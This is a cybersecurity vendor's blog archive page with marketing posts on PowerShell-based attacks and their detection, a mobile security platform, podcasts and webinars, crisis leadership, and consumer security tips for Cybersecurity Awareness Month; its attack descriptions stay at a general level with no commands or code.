Cybersecurity Strategy Archives

Cybersecurity strategy resources helping organizations proactively defend against evolving threats.

Battling PowerShell Attacks with Cybersecurity Automation

July 13, 2023/in Blog Post/by Ellen Loughlin

By: Krystal Rennie, Director of Corporate Communications

In today’s digital age, there are multiple ways that we use computer systems to carry out our everyday tasks. From accessing the internet to sending emails, we constantly exhibit new patterns in navigating the digital world through automation. While this is normal behavior, it also leaves trails for cybercriminals to use against your organization.

According to Microsoft, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.” It provides an interface for system administrators and users to carry out various tasks like running files, taking screenshots on the computer, accessing the internet, and more.

This blog will explore how cybercriminals can use PowerShell, why they are so hard to detect, and how you can ensure your organization remains vigilant against attackers.

PowerShell Attacks in Action

To put it simply, PowerShell is a language installed on all Windows computers, so by default, it is an easy entry point for cybercriminals to abuse because they do not have to bring their own tools. PowerShell is also used by system administrators to complete their tasks and is required to make Windows run, so it cannot be removed from Windows as it is a core functionality.

In action, cybercriminals tend to abuse PowerShell because it allows them to take full advantage of it as a living-off-the-land tactic. Malicious actors can use PowerShell to create a malware implant or download and execute malware. Once they access your network, they can run commands and remain under the radar.

For example, an attacker can execute PowerShell through a simple spear phishing email, and the email includes a PDF or a Word document as an attachment; when the PDF or Word document gets opened, that then triggers PowerShell to run at the end of the malware code. PowerShell will then download the additional malware stages to infect the computer.

Cybercriminals do not go out of their way to reinvent the wheel when planning their attacks; where there is an easy point of entry, they will use it to their advantage. Opening an attachment is a common task for employees, and cybercriminals know that. Using familiar techniques like the above is a perfect way to lure in potential victims and gain access to organizational data.

Why are PowerShell Attacks Difficult to Detect?

As attackers advance their techniques, they also recognize that to maintain success, they must keep their tactics simple yet effective. Below are a few reasons PowerShell attacks are hard to detect:

Easy Access to Windows API: PowerShell allows cybercriminals to carry out automated tasks and everyday administrative tasks without having to worry about being blocked by an IT team.
Living-off-the-Land: PowerShell is a powerful command prompt that can do whatever it’s told. Cybercriminals use PowerShell as a native tool operating within all Windows computers to advance their attacks. The ability to use techniques that are already a part of a system allows cybercriminals to do less prep work and execute quicker.
Hiding in Plain Sight: Cybercriminals will often encode PowerShell algorithms to make them appear as a string of letters and numbers. This allows the detection of malicious commands to obscure security systems because it would require decoding.

Although detection can be tricky when looking at PowerShell as an attack method, with proper tools in place, such as an automated security solution with threat intelligence, it is not impossible.

For example, Adlumin’s Threat Research team recently uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry. The malicious malware uses advanced techniques to evade detection such as deception, encoding, and encryption. The threat was detected by Adlumin’s machine learning-based algorithms which analyze PowerShell commands and arguments at run-time. In essence, the malware is used to run remote commands against victim networks after gaining initial access, execution, and persistence into servers.

Implementing an automated security solution with a multi-layer detection approach is the key to successfully uncovering attackers’ actions in your network and protecting your organization before chaos hits. With the proper solution malicious behavior can be detected, alerted and responded to in real-time.

Test Your Defenses: PowerShell Attack Simulator Tool

Ensuring your organization has the proper tools and proactive measures to protect against PowerShell attacks is essential. Specifically, testing your environment for PowerShell-based attacks. As automation, cybersecurity, and the digital landscape evolve, cybercriminals will only become more advanced in planning their attacks.

Adlumin has developed a free tool for security teams to test their defenses against common ways attackers gain access. PowerShell is a common tool attackers leverage to infiltrate an environment. The simulation runs through multiple ways PowerShell may be used maliciously so that you can gain visibility into your coverage against these threats.

See how your security stands against the tactics and tricks used by cybercriminals. Download Adlumin’s free PowerShell Attack Simulator tool today or contact one of our cybersecurity experts for a demo and more information.

The Executive's Guide to Cybersecurity

June 26, 2023/in Guides/by Adlumin Staff

Cyber Tide Season 1, Episode 4: Mark Sangster & Robert Darling Recap How Their Field Experience Shaped Their Ability to Deal with Cyber Crises, Cyber Crime, & More

April 26, 2023/in Podcasts/by Adlumin Staff

In episode four of Cyber Tide, Mark Sangster, Chief of Strategy at Adlumin, and Robert Darling, Founder at Flash-EM recap their experiences from RSAC 2023, how their experiences in the field have help shaped their abilities to deal with cyber crises, the scope of the problem of cybercrime, and more.

You can subscribe to CyberTide via Apple and  Spotify.

About the Cyber Tide Series

Dive beneath the surface of infamous cybersecurity attacks to learn the means and motives of cyber adversaries. In each episode, we invite an expert to reveal the contributing factors and costs of cyber incidents and how your firm can protect itself from business-disrupting cyberattacks.

3 Benefits of a Mobile-Friendly Security Operations Platform

April 20, 2023/in Blog Post Brittany Demendi/by Ellen Loughlin

By: Brittany Demendi, Corporate Communications Manager

In today’s increasingly mobile world, organizations must be able to access their security operations platform anywhere, anytime. Having 24/7 visibility into your environment on the go is a game changer. Specifically, Adlumin’s Security Operations Platform allows users to see the exact same view from any device as they would on their computer. This is essential to ensure everyone has complete visibility and is on the same page, keeping organizations secure and up to date with the latest threats regardless of where they’re located.

Having access to a security operations platform from a mobile device can provide several benefits:

24×7 Visibility to Your Environment:
- First, when cybersecurity professionals are on the go, they can easily access their organization’s security operations platform from their mobile device to view their environment, giving them visibility to potential security incidents while they are still happening. It can provide real-time updates on the latest security threats, allowing organizations to identify potential issues proactively.
- The Adlumin mobile-friendly Security Operations Platform tracks cybercriminal behavior. It can quickly identify when there is an attacker within an organization’s environment—ultimately learning what goes on within every phase of an attack.
Take on a Proactive Security Strategy and Reduce Dwell Time:
- Second, accessing a security operations platform from a mobile device can help organizations stay ahead of the curve. This can drastically reduce the time it takes to mitigate potential threats, minimize the risk of compromised data, and take steps to prevent threats from becoming issues.
- Adlumin’s Security Orchestration, Automation, and Response (SOAR) capability analyzes gathered data and deploys automated responses for each specific threat brought to light. When cybersecurity professionals can access their security operations platform on the go, they can see any alert produced from the SOAR capability come through.
Provide Flexibility and Agility:
- Finally, accessing a security operations platform from a mobile device can provide organizations with the flexibility and agility to respond quickly to any changes in the security environment. It can also provide organizations access to the latest security and compliance tools and technologies, allowing them to stay on top of the latest developments in the security space.
- Adlumin’s Security Operations Platform provides one-touch compliance reporting and monitoring from your mobile or tablet device for instant access. Security teams are being asked to use data-driven processes to improve their cybersecurity posture, so Adlumin’s reporting module produces reports based on live, accurate, and contextualized data.

One Platform, Multiple Views

Adlumin is launching a new user interface (UI) that enables users to view the same platform as its security analysts from any device, anytime. The streamlined design has improved navigation allowing users to quickly access the information they need to make informed decisions and act promptly against potential threats. What’s new?

Mobile-Friendly Design: The new UI is fully responsive so that you can access your cybersecurity data anywhere, on any device.
Improved Search Functionality: Search capabilities are updated, so you can quickly get answers to large and complex searches.
Enhanced Reporting Capabilities: Reports include a new look and provide more insights and details.
Simplified Navigation: The platform is reorganized to make it easier to find features.

With the rise of mobile devices, organizations need to have the ability to access their security operations platform from their mobile device while on the go. Doing so can provide organizations with the tools and information they need to identify, investigate, and respond to security threats quickly and effectively while staying up to date with the latest developments in the security space.

Learn more about how Adlumin’s Managed Detection and Response Services and Security Operations Platform can empower your team to illuminate threats, eliminate cyber risk, and command authority. Contact us today, schedule a demo, or sign-up for a free trial.

Cyber Tide Season 1, Episode 3: Three Lessons from Law Enforcement for Small to Medium-Sized Organizations

February 23, 2023/in Podcasts/by Adlumin Staff

Adlumin co-hosts Mark Sangster, VP of Strategy, and Tim Evans, Co-founder and EVP, go below the headlines to learn from FBI veteran and EVP – CISO, John Caruthers at Triden Group.

John shares his experiences as a supervisory special agent focused on national cybersecurity, legal attaché to European police liaison, and his work supporting various businesses through cyberattacks. Sangster and Evans discuss his work in manufacturing, executive awareness training, and the lessons learned fighting state-sponsored actors.

You can subscribe to CyberTide via Apple and  Spotify.

About the Cyber Tide Series

Listen to Cyber Tide Episode 3

YouTube: https://youtu.be/38KfUQgj2fU
Apple: https://apple.co/3DVeHgH
Spotify: https://spoti.fi/3tj5J8d

Local-Level Threats: Cybersecurity Strategies for Regional Businesses

February 7, 2023/in Blog Post/by Ellen Loughlin

Local-Level Threats: Cybersecurity Strategies for Regional Businesses

Date: February 16, 2023
Time: 1:00 PM- 1:30 PM Eastern
Attendee Link: https://adlumin.com/webinar/local-level-threats-cybersecurity-strategies-for-regional-businesses/

Securing your infrastructure is a challenge for any business in 2023. Between the uncertainty of the current economic landscape and the difficulty of maintaining on-premise and cloud hybrid environments, cybersecurity teams must factor in a lot of moving parts. For regional businesses, the problems are often exacerbated by less-developed security strategies, limited resources — and a higher volume of cyberattacks. To protect against these digital threats, regional organizations must explore the right cybersecurity solution for their specific needs.

Security solutions that work for an enterprise-scale business are not always what’s best for regional companies. Join cybersecurity experts and enthusiasts from Adlumin and ESG as they uncover threats regional businesses should be paying attention to and outline how to find a Security Operations vendor that fits your architecture. Reserve your spot.

Tune in to learn:

What unique security challenges are plaguing regional-level organizations?
How do you conduct an internal security audit and pinpoint your Security Operations Platform needs?
What differentiates the Adlumin Platform?
Why are transparency, MDR Services, and live reporting important?

Navigating Strong Personalities: Effective Leadership in Cyber Crisis Management

January 10, 2023/in Blog Post/by Adlumin Staff

By: Mark Sangster, Chief of Strategy

In a cyber crisis, who makes the decisions: The senior person? The technical expert? The self-appointed hero? When it comes to effective crisis leadership, removing emotion is critical. This guide identifies six personalities that emerge during a cyber crisis and how to harness challenging styles.

You’ll learn about the following personalities:

The Hero
The Martyr
The Hinderer
The Hoarder
The Captain

Harness Each Personality

Everyone metabolizes stress differently. To be the most effective leader during a cyber crisis, it is important to learn how to navigate the pitfalls of the human element. Quickly identifying learning types helps team leaders and executives assign specific members to the incident response team and assign responsibilities and tasks.

Download The Ultimate Guide to Managing Strong Personalities During a Cyber Crisis to learn how to manage these personalities properly.

The “Impossible Landing”: Piloting Through a Cyber Crisis

November 17, 2022/in Blog Post Mark Sangster/by Shannon Flaherty

The events of the United Airlines Flight 232 crash landing improved how flight crews work together in catastrophic incidents, providing valuable parallels for how we protect our businesses. Learn how the flight crew used experimentation and teamwork to steer the plane to safety and how these lessons can improve cybersecurity practices today.

Full Threat Lifecycle Management Model Applications

October 20, 2022/in Resources Mark Sangster/by Adlumin Staff

Learn about the industrialization of cybercrime, top cybersecurity challenges, the impact of MDR/XDR architecture, and the benefits of adopting the NIST framework in this paper. Download now to gain valuable insights into the current threat landscape and how to protect your organization.

Raising Awareness Through Cybersecurity Awareness Month (CAM)

October 5, 2022/in Blog Post/by Shannon Flaherty

By: Cybersecurity & Infrastructure Security Agency (CISA)

It’s October, so we are officially kicking off Cybersecurity Awareness Month (CAM). The annual initiative, driven by the Cybersecurity & Infrastructure Security Agency (CISA), is dedicated to raising awareness about the importance of prioritizing cybersecurity. This year’s overarching theme is “See Yourself in Cyber,” encouraging us all to see the roles we play in cybersecurity actively.

Cybersecurity has become one of the biggest hot topics inside and outside technology circles over the last two years. From securing learning devices due to a rise in digital learning during the COVID-19 pandemic to coping with the fallout of high-profile breaches of national infrastructure such as the Colonial Pipeline, there is a seemingly endless news cycle dedicated to cybersecurity mishaps and concerns.

And with this onslaught of negative news, it can be easy for everyday individuals to become overwhelmed and feel powerless in the face of the “insurmountable” threats posed by cybersecurity. But in actuality, nothing could be further from the truth.

With all the jargon typically thrown around in cybersecurity, there is a longstanding misperception that cybersecurity is beyond everyday people and that it should be left to professionals. Moreover, there is a prevailing sense among the public that breaches are simply a fact of life and that we should just learn to deal with them. But this just isn’t true. In fact, everyday people have a huge role to play in cybersecurity threat prevention, detection, and remediation. For example, according to IBM, 95% of breaches have human error as a main cause. Therefore, everyday day technology users are very much the first line of defense when it comes to thwarting cybercrime. Unfortunately, though, many individuals are not aware of some of the best practices for boosting cybersecurity and how easy they are to use.

With that, here are a few key best practices that everyday people can implement today to enhance their own cybersecurity and create a more secure world for everyone.

Watch Out for Phishing

Phishing – when a cybercriminal poses as a legitimate party in hopes of getting individuals to engage with malicious content or links – remains one of the most popular tactics among cybercriminals today. In fact, 80% of cybersecurity incidents stem from a phishing attempt. However, while phishing has gotten more sophisticated, keeping an eye out for typos, poor graphics, and other suspicious characteristics can be a telltale sign that the content is potentially coming from a “phish.” In addition, if you think you have spotted a phishing attempt, report the incident so that internal IT teams and service providers can remediate the situation and prevent others from possibly becoming victims.
Update Your Passwords and Use a Password Manager

Having unique, long, and complex passwords is one of the best ways to boost your cybersecurity immediately. Yet, only 43% of the public say that they “always” or “very often” use strong passwords. Password cracking is one of the go-to tactics that cybercriminals turn to in order to access sensitive information. And if you are a “password repeater,” once a cybercriminal has hacked one of your accounts, they can easily do the same across all of your accounts.One of the biggest reasons that individuals repeat passwords is that it can be tough to remember all of the passwords you have. Fortunately, by using a password manager, individuals can securely store all of their unique passwords in one place. Meaning people only have to remember one password. In addition, password managers are incredibly easy to use and can automatically plug in stored passwords when you visit a site.
Enable MFA

Enabling multi-factor authentication (MFA) – which prompts a user to input a second set of verifying information such as a secure code sent to a mobile device or to sign in via an authenticator app – is a hugely effective measure that anyone can use to reduce the chances of a cybersecurity breach drastically. In fact, according to Microsoft, MFA is 99.9 percent effective in preventing breaches. Therefore, it is a must for any individual that is looking to secure their devices and accounts.
Activate Automatic Updates

Making sure devices are always up to date with the most recent versions is essential to preventing cybersecurity issues from cropping up. Cybersecurity is an ongoing effort, and updates are hugely important in helping to address vulnerabilities that have been uncovered as well as in providing ongoing maintenance. Therefore, instead of trying to remember to check for updates or closing out of update notifications, enable automatic update installations whenever possible.